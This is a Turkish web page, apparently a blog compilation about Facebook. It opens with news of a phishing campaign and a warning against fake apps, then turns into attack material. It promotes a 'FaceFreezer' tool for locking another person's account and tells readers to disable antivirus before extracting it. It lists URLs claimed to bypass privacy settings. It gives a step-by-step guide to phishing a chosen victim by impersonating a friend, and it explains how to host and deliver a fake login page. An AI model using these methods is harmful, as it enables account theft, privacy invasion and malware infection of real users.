İnternet korsanları (hacker), Facebook kullanıcılarını hedef aldıkları son saldırıda, yüzlerce şifre ele geçirdi. Facebook sözcüsü Barry Schnitt, kendilerine “Iran Hacking Sabotage, CyberProtest TIM, Team-Evil” adını veren korsanlar tarafından saldırı oldugunu doğrularken korsanların yol açtığı zararı gidermek için çalışmalarının devam ettiğini açıkladı. Sözcü, şifresi korsanların eline geçen hesapları iptal etmekte olduklarını kaydetti. İnternet korsanları, Facebook şifrelerini ele geçirdikleri kişilerin hesabından, listedeki arkadaşlarına sahte postalar ve linkler gönderiyor. Bu yolla kullanıcıları Facebook sayfasına benzeyen sahte siteye yönlendiren korsanlar, burada adını ve şifresini yazan yeni kurbanların hesaplarını da ele geçiriyorlar. Facebook tarafından sahte sitelere yönlendirilen tüm linkler iptal edilmiştir.
Korsanların yaptıkları saldırıda genellikle ırkçı gruplar ve islamiyeti kötüleyici açıklamaların bulundugu Sayfalar, Gruplar ve Kişiler hedef alınmıştır.
Error Check System Facebook Uygulamasıyla Şifreniz Çalınabilir!
Kısa Aralıklarla Ortaya Çıkan İki Facebook Uygulaması, Kullanıcıların Kişisel Bilgilerini Elde Etmek İçin Benzer Yöntemlere Başvuruyor. İlk Olarak Birkaç Gün Önce Görülen “Error Check System” Uygulaması, Kullanıcılara Profillerinin Görüntülenemediğini Söyleyerek Şifrelerini Çalmaya Çalışıyordu.
Yeni Uygulama ve En Tehlikeli Olanı İse Facebook’un Kullanıcı Sözleşmesini İhlal Ettikleri Gerekçesiyle, Profillerinin Silinmek Üzere Olduğunu Söyleyerek Korkutuyor ve Kullanıcıların Hesaplarını Hack Ediyorlar.
Not: Bu Yüzden Herzaman Dedigimiz Gibi Facebook Türkiye Ekibi‘nin Yayınlamadıgı Uygulamaları Kullanmayınız Facebook Türkiye‘nin Sizlerle Paylaştıgı Uygulamalar ve Programlar Bir Dizi Testlerden Geçmektedir. Facebook Hesaplarınız İçin Bu Uyarımızı Dikkate Almanızı Tavsiye Ediyoruz…
Facebook İle İlgili Yenileri ve Merak Edilen Herşeyi İlk Bizden Öğrenmeye Devam Ediyorsunuz…
İstediginiz Kişinin Facebook Hesabını Kilitlemek İstermisiniz?
FaceFreezer v1.0 BURADAN İndirin. Neler Yapabilirsiniz. Sizi Sinirlendiren Birisimi Var? Onun Facebook Hesabını Kilitlemek İstiyorsunuz Bunun İçin Yapmanız Gereken Facebook.’unu Açtığı Mail Hesabını Proğrama Girin. Sonra Freeze Dedikten Sonra Program Ekranında % Olarak Çıkıyor. %100 Olmasını Bekleyin Bu İşlem Maksimum 2 – 3 Dakika Zaman Alıyor. Tamamen Donduruldugunda Kurbanınız Facebook Hesabına Girdiği Zaman “Hesabın İçin İzin Verilen Hatalı Giriş Sınırını Aştın. Şifreni Unuttuysan , Şifreni Buradan Yenile” Şeklinde Bilgi Notuyla Karşılaşır. Bizzat Editörlerimiz Tarafından Test Edilip Onaylanmıştır. Bunu Arkadaşlarınıza Şaka Şeklinde Kullanabilirsiniz..
Not: İndirdiğiniz Programın Şifresi cyberprotest.org ‘dir. Programı .rar dan Çıkartmadan Önce Kullandıgınız Virus Programını Pasif Konuma Getirin Bunu Şöyle Düşünün Herhangi Bir Programın Keygen ‘i Açtıgınızda Nasıl Virus Olarak Görüyorsa Bunuda Görmektedir. Bahsettigimiz Gibi tr-facebook.net Editörleri Tarafından Onaylanmıştır.
Burak ÖZERK de kullancıların ikide birde hesaplarını kontrol etmelerine kolaylık getirmek için bir facebook habercisi yazmıştır. Facebook Desktop adını taşıyan program belirlediğiniz aralıklarla hesabınızı kontrol edip varsa yeni mesajları, yeni arkadaş isteklerini, yeni duvar eklemelerini ve yeni pokeleri bildiriyor. Çalışma prensibi açısından Gmail Notifieri hatırlatan bir yazılım.Facebook Müptelaları İçin Güzel Bir Program Facebook Türkiye Farkıyla…
Programı İndirmeden Önce Sırasıyla
Windows Installer 3.1 sonrasında .Net Framework 3.5 Yüklemeniz Gerekmektedir. Bunları Yükledikten Sonra Programı BURADAN Bilgisayarınıza Kurup Çalıştırabilirsiniz.
Herhangi Bir Sorun Oldugunda Lütfen Yorumlarınızla Belirtiniz Sizlere Elimizden Gelen Yardımları Göstermek İçin Buradayız…
Ne kadar gizlesenizde özel bilgileriniz, Facebook’ta tamamıyla açık.Birkaç basit yöntemle tüm sakladığınız herşey gün ışığına çıkıyor.
Facebook’taki açıkları daha iyi anlayabilmek için öncelikle 2 kavramı bilmemiz gerekir.Bunlar id ve network’tür.
Id siteye üye olan her kullanıcıya verilen sıra numarasıdır.İkinci kavram network sizin bulunduğunuz ülke veya okuduğunuz okul için özelleşmiş gruplardır.Network bir tür ortak nokta olduğu için Facebook bazı özellikleri kişinin bağlı olduğu network’teki üyelerin görebileceği şekilde kodluyor.
Photo Comment(Yorum Açığı)
Bir kodlama açığıdır.Kişi bağlı bulunduğu network’e açıksa yada hiçbir network’e üye değilse kişinin fotoraflarına yapılan yorumları ve fotoraflarını görebilirsiniz.aynı anda binlerce network’e bağlı gözükebilirsiniz.Açığın kullanımı
http://www.facebook.com/photo_comments.php?id=kişininFininidnumarasi
View Friends Açığı(Arkadaş listesi açığı)
Arama sonuçlarında gördüğümüz gibi bazı kullanıcılar view friends özelliğini kısıtlamış durumda ve arkadaş listesini göremiyoruz.Yukarda anlattığım photo comment açığı ile kişinin herhangi bir resmini tıklıyoruz.Resim açıldıktan sonra “Tag this photo” diyerek resmin üzerinde bir yere tıklıyoruz.Karşımıza küçük bir kutu açılıyo ve kişinin arkadaş listesi yükleniyor.Bu şeilde arkadaş listesine ulaşabiliyoruz.
Super wall açığı
Eğer kişi profilini gizlemişse ve arkadaşlarını görmemzi de engelliyorsa sıradan bir kullanıcı için kişi hakkında tek ulaşabileceği bilgi Facebook’a üyeliği ve eğer eklemişse kişisel resmidir.Bu kısıtlı durum super wall ile aşılabiliyor.BU açık ile kişi tüm güvenlik ayarlarını maksimum tutsa bile girebiliyoruz
http://apps.facebook.com/superwall/view.php?id=KişininIdNumarası
Artık kişiye gelen mesajları görebilir.Kişinin fikri yapısı ve hayat görüşü gibi önemli bilgilere ulaşabilirsiniz.
Fun Wall Açığı
Fun wall da super wall’a benzeri uygulama.Farkı bu uygulamada daha çok mizahi videoların bulunması.Bu açık sayesinde kişinin kullanıcı ve hangi videoları kabul edip etmediğini görebiliyoruz.
http://apps.facebook.com/crazyfunpix/view.php?id=KişininIdNumarası
şeklinde kullanıyor.Bu sayede kişinin fun wall’ına bağlanabiliyor bilgilere girebiliyoruz.
Facebook Bug’ları
Facebook dünyanın en çok tıklanan sitelerinden biri olmasına rağmen yinede bazı programlama hatalarına sahip.Aktivasyon yapmayan üyelerin bilgilerinin de tamamen saklanmasına rağmen bir kod hatası ile sisteme girebiliyor ve kişinin ismini görebiliyoruz.örneğin kişi 123 numarası ile aktivasyon yapmamış o zaman
http://www.facebook.com/profile.php?id=123
tıklayın ve bizi doğrudan anasayfaya atıyor ve bilgi vermiyor fakat
http://www.facebook.com/album.php?aid=3&id=123 yaptığımız taktirde içerik bulunamadı diye hata veriyor.Ama alttaki satırlardan biri “View 123(kişinin adı)” şeklindedir.Bu hesabın kime ait olduğunu bulabiliyoruz.
Karışık şifreleme değil base64
Birisi size mesaj yollayınca facebook’ta kayıtla epostanıza bir uyarı geliyor.
örneğin Korkut Peker adlı arkadaşınızın yolladığı bir mesajun karşısında “Want to ontrol which emails you receive from facebook? Go to :”
http://www.facebook.com/editaccount.php?notifiations&md=bXNnO2Zyb209Njc3MD QyNDExO3Q9MjUxNTEwMTAxODU=
kısayolu çıkıyor.ilk bakışta karmaşık gibi gözüksede ama sadece bu base64 şifreleme biçimi.Burada md= ’ten sonraki kısım karmaşık yapıyı alır herhangi bir base64 encoder yardımı ile çözdüğünüzde msg;from=677042411;t=25151010185″olduğunu görebiliriz.Size önerim CyberProtest TIM ’in yapmış olduğu Hack3r Trainer-CPptic’i kullanmanızdır. Mesajı kim yollamış Facebook’ta kaçıncı sırada yollanan mesaj anlayabiliriz.Hatta belli aralıklar ile bu mesaj saısındaki mesaj trafiğini inceleyebiliriz.
————————————————————————————–
Facebook Hack (SM ve Fake)
Selamun Aleykum Arkadaşlar…
Fake Yapması Kolay Fakat Fake yedirmeye geldiği zaman herkesin kendi becerisine ve kendi Yöntemlerine kalıyor.Bazı Arkadaşlar bu konuda sıkıntı çekiyor tabiki farklı yöntemler mevcut …bir yöntem de ben paylaşayım belki arkadaşlara kolaylık olur …
1.)Facebooktan Kurban Seçilir…
2.)Daha Sonra ekleyemiyeceğimiz birisi olsun yani tanımadıgımız bizde ekli olmayan birisi… /Arkadaşlarına Bak Kısmına Girerek kurbanımızın samimi oldugu bir isim ve soyisim alıyoruz …
3.)Aldıgımız bu isim soyisimle yeni bir facebook hesabı acıyoruz…
4.)Açtığımız bu hesabın profıl resımıne o arkadaşının resimini faklı kaydet deyip bilgisayarımıza kopyaladıktan sonra resimi profıl resmının yerıne koyuyoruz…
5.) Daha Sonra Fakemizi Hazırlayıp Örneğin kimengellemis fakesi yapıp kurbana arkadaşının hesabından pm atıyoruz .(pm’yi attığımız zaman arkadaşının isimi ve profıl resımı gozukuyor)
6.)kurban pm açtıgında karşısına bir resim ve mesaj gelıyor yanı arkadaşının dırek bıyere tıklamadıgı surece profıl bılgı ve resımlerı fln gozukmuyor ee kurbanımızda dırek pmyı acıyor
7.)fakemizi yolluyoruz ve dıyoruzkı örn konusma bir kız karsımızdakı ve arkadaşının profılıde kız aldık dıyelım :ayse gecen bana da mehmet attı engelleyenleri gösterıo bir dene istersen baya isime yaradı dıyorsunuz ve lınkı koyuyorsunuz kurbanımız maılı actıgında lınke tıklayıp meraktan maıl ve sıfresını yazarak gırısı denıyor 
eee ne demısler ınsanın basına ne gelırse meraktan…
————————————————————————————–
FaceBook Hack Web Kontrollü [VideoLu]
Web Kontollü FaceBook Fake. Kullanımınıda kısaca anlatayım Ftpnize vermiş olduğum kodlarla fake dosyasını upload edin.Sonra gerekli cmod izinlerini verin sayfayı hedef kişiye ulaştırın.Bu ulaştırma site nin linkini vererek ya da mail ile ip spoofing yöntemi ile olabilir burası sizin sosyal mühendislik becerinize kalmış.
__________________________
Facebook Türkiye Yöneticilerinden Olan Buğra AYAN ‘ın CHIP Dergisi İle Paylaştıgı Çok Özel Güvenlik Açıklarını Buradan İndirebilirsiniz.
Şifresi; tr-facebook.net
